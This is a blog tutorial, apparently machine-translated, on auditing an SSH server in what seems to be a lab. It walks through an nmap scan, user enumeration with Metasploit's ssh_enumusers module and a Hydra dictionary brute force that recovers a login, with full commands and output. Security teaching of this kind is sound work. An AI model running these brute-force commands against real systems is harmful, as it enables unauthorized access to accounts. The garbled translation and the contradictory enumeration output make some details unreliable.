News

recent
Home LINUX Auditando Servidores SSH com Hydra e Metasploit Framework

Auditando Servidores SSH com Hydra e Metasploit Framework

Auditando Servidores SSH com Hydra e Metasploit Framework

Today I will spend a single intrusion test script on Linux servers, more specifically on SSH services making brute force in usernames and passwords in order to identify possible logins on the system with team-based attacks and brute force to dictionary attacks on passwords found users .

 Let's take an NMAP on the target host to see the type of information we can get about the same:

 # nmap -sS -sC 192.168.0.34  

 root@fidelis:/home/matheus# nmap -sS -sV -sC 192.168.0.34   
   
 Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2015-11-17 11:31 BRST  
 Nmap scan report for 192.168.0.34  
 Host is up (0.00095s latency).  
 Not shown: 998 closed ports  
 PORT  STATE SERVICE VERSION  
 22/tcp open ssh   OpenSSH 6.0p1 Debian 4 (protocol 2.0)  
 | ssh-hostkey:   
 |  2048 23:e8:e2:93:f7:36:0a:83:ce:83:be:b2:3d:9f:3f:d9 (RSA)  
 |_ 256 92:c9:f2:42:82:a8:c9:8f:2b:28:cb:2e:12:24:80:40 (ECDSA)  
 111/tcp open rpcbind 2-4 (RPC #100000)  
 | rpcinfo:   
 |  program version  port/proto service  
 |  100000 2,3,4    111/tcp rpcbind  
 |_ 100000 2,3,4    111/udp rpcbind  
 MAC Address: 08:00:27:2D:7A:AC (Cadmus Computer Systems)  
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel  
   
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  
 Nmap done: 1 IP address (1 host up) scanned in 15.66 seconds

We have identified some doors and some versions of the services running on the system ports, plus some information exposed unnecessarily to identify the SSH keys. We also identify the version of the SSH service, if OpenSSH 6.0

 In the example we need to make use of 2 Wordlists a Userlist with different user names and passwords Passlist with possible we will use to perform a brute-force the passwords of users who try to identify future.

 Let's start PostgreSQL services and open the Metasploit Framework console.

 # service postgresql start  
 # msfconsole

We will use a brute force module in user that runs on Metasploit time limits, the auxiliary is the auxiliary / scanner / ssh / ssh_enumusers. Let's arrow it in the metasploit and list the options that we have to necessarily go to the module.
 msf > use auxiliary/scanner/ssh/ssh_enumusers  
 msf auxiliary(ssh_enumusers) > show options
 msf auxiliary(ssh_enumusers) > show options  
   
 Module options (auxiliary/scanner/ssh/ssh_enumusers):  
   
   Name    Current Setting Required Description  
   ----    --------------- -------- -----------  
   Proxies          no     A proxy chain of format type:host:port[,type:host:port][...]  
   RHOSTS           yes    The target address range or CIDR identifier  
   RPORT   22       yes    The target port  
   THREADS  1       yes    The number of concurrent threads  
   THRESHOLD 10     yes    Amount of seconds needed before a user is considered found  
   USER_FILE        yes    File containing usernames, one per line  
   
 msf auxiliary(ssh_enumusers) >

Here are some important points to consider:

  • Rhosts: We will set the Host that will test
  • RPORT: The service port by default is 22
  • THREADS: We will set the number that threads that will work in attack
  • THRESHOLD: We will set the timeout that the attack will use to recognize the limit of hosts
  • Userfile: The path of passlist with the names of users

Let's set some parameters of the module, respectively by setting the target IP and userlist

 msf auxiliary(ssh_enumusers) > set RHOSTS 192.168.0.34  
 msf auxiliary(ssh_enumusers) > set USER_FILE /home/matheus/userlist.txt

 msf auxiliary(ssh_enumusers) > run  
   
 [*] 192.168.0.34:22 - SSH - Checking for false positives  
 [*] 192.168.0.34:22 - SSH - Starting scan  
 [-] 192.168.0.34:22 - SSH - User 'Administrator' not found  
 [-] 192.168.0.34:22 - SSH - User 'administrator' not found  
 [-] 192.168.0.34:22 - SSH - User 'test' not found  
 [-] 192.168.0.34:22 - SSH - User 'sysadmin' not found  
 [-] 192.168.0.34:22 - SSH - User 'asd' not found  
 [-] 192.168.0.34:22 - SSH - User 'cienciahacker' not found  
 [-] 192.168.0.34:22 - SSH - User 'root' not found  
 [-] 192.168.0.34:22 - SSH - User 'qwerty' not found  
 [-] 192.168.0.34:22 - SSH - User 'matheus' not found  
 [-] 192.168.0.34:22 - SSH - User 'superuser' not found  
 [-] 192.168.0.34:22 - SSH - User 'security' not found  
 [-] 192.168.0.34:22 - SSH - User 'sysadmin' not found  
 [-] 192.168.0.34:22 - SSH - User 'operator' not found  
 [+] 192.168.0.34:22 - SSH - User 'matheus' found
There, we find a valid user named 'matheus' let's run brute force using the hydra

 # hydra -l matheus -P passlist.txt 192.168.0.34 ssh -v -V  

 Hydra (http://www.thc.org/thc-hydra) starting at 2015-11-17 15:58:53  
 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4  
 [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...  
 [DATA] max 16 tasks per 1 server, overall 64 tasks, 1656650 login tries (l:1/p:1656650), ~1617 tries per task  
 [DATA] attacking service ssh on port 22  
 [VERBOSE] Resolving addresses ... done  
 [INFO] Testing if password authentication is supported by ssh://192.168.0.34:22  
 [INFO] Successful, password authentication is supported by ssh://192.168.0.34:22  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "!root" - 1 of 1656650 [child 0]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "0" - 2 of 1656650 [child 1]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "0000" - 3 of 1656650 [child 2]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "test" - 4 of 1656650 [child 3]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "000000" - 5 of 1656650 [child 4]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "00000000" - 6 of 1656650 [child 5]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "000007" - 7 of 1656650 [child 6]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "0007" - 8 of 1656650 [child 7]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "007007" - 9 of 1656650 [child 8]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "0311" - 10 of 1656650 [child 9]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "0660" - 11 of 1656650 [child 10]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "098765" - 12 of 1656650 [child 11]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "1" - 13 of 1656650 [child 12]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "100000" - 14 of 1656650 [child 13]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "1002" - 15 of 1656650 [child 14]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "1230" - 49 of 1656652 [child 15]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "123123" - 50 of 1656652 [child 5]  
 [22][ssh] host: 192.168.0.34  login: matheus  password: winner



Video made contribution to the Science Hacker with the theme:

Auditando Servidores SSH com Hydra e Metasploit Framework Reviewed by Unknown on 12:08:00 PM Rating: 5

Tags :

About TOS

Number of Entries :

All Rights Reserved by TOS © 2014 - 2015
Powered By Blogger, Designed by Sweetheme

Contact Form

Name

Email *

Message *

Powered by Blogger.